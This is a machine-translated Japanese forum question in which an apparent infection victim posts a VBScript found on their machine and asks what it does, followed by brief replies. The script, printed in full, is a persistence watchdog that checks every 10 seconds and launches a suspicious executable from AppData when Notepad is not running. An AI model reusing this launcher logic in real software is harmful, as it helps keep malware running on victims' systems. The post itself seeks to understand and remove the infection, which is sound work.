に感染した私が言うたい申し訳ありませんまず、誰かがこのコードを理解するのに役立つことができますか?トロイの木馬ドロッパーVBSスクリプト
problyこのありえないこれらのようなものを頼むのに最適な場所が、私は、ウイルスに感染していたし、痕跡を残しているようです。
誰かがいくつかのスクリプトの背後にあるコードを理解できれば、私は非常に感謝しています。私は、コードを右にフォーマットさ願う
Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then
MsgBox "There is an existing proceeding !" & VbCrLF &_
CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"
WScript.Quit
Else
Do
Pause(10) ' Pause 10 seconds
If CheckProcess(DblQuote(ProcessPath)) = False Then
Call Logoff()
End If
Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
strComputer = "."
Tab = Split(ProcessPath,"\")
ProcessName = Tab(UBound(Tab))
ProcessName = Replace(ProcessName,Chr(34),"")
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = '"& ProcessName & "'")
If colProcesses.Count = 0 Then
CheckProcess = False
Else
CheckProcess = True
End if
End Function
'**************************************************************************
Function DblQuote(Str)
DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit
End sub
'**************************************************************************
Sub Pause(Secs)
Wscript.Sleep(Secs * 1000)
End Sub
'**************************************************************************
Function AppPrevInstance()
With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")
With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
" AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")
AppPrevInstance = (.Count > 1)
End With
End With
End Function
'***************************************************************************
Function CommandLineLike(ProcessPath)
ProcessPath = Replace(ProcessPath, "\", "\\")
CommandLineLike = "'%" & ProcessPath & "%'"
End Function
'****************************************************************************
は、他のいくつかのスクリプトがありますが、TXT形式で、diferenceはobjShell.Execであることは、このように、「%ワーキング%」にリモコン:
objShell.Exec("%working%")^
それより簡単
AppVShNotifytvbs.vbs PasteBin link
行う場合、私はそれのつもりポストペーストビンさんです3210AppVShNotifytvbs.txt Pastebin link
[情報セキュリティ](https://security.stackexchange.com/)に属しているため、この質問を議論の対象外としています。 –
ちょうど私はあなたがこのvBScriptを手に入れたのだろうか?私は元のスクリプトは、変更されたものではないという意味ですか? – Hackoo
私は疑わしいプログラムを起動し、いくつかのクイックcmdは、実行中にインスタンスのポップアップ、私はシステムをスキャンするために急いで、そこは、スクリプトは正確に(いくつかのxmlファイルとexe拡張子。主なプログラムは、ドライブにAppVShNotifyt.exeとそれらのスクリプトを持っているようなトロイの木馬のようなものでした。 –